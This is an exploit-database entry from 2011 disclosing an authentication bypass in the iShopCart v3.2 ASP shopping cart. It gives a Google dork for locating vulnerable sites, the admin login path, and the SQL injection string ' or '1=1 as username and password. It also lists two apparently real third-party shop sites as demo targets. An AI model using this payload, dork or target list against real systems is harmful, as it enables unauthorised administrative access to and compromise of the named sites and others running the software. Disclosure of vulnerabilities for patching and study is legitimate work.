id: 15960
date: 04/27/2011
title: iShopCart v3.2 Auth Bypass Vulnerability
author: Kalashinkov3
cves: 

####################################################
# Title : iShopCart v3.2 Auth Bypass Vulnerability
#
# Author: Kalashinkov3
#
# Email : kalashinkov3@Hotmail.fr
#
# Vendor : http://www.ishopcart.ch/
# 
# date : 25/04/2011
#
# Google Dork : intext:"Powered by RVB Productions" 
#                
# category  : ASP
#       
#####################################################

# http://[localhost].ch/admin

# Username : ' or '1=1
# Password : ' or '1=1

Demo : 
http://www.grossrieder-import.ch/admin
http://www.ilsehasler.ch/admin


=========================================
# Greets To :  All Algerians Hacker'S ;)#
=========================================



#  0day.today [2023-03-23]  #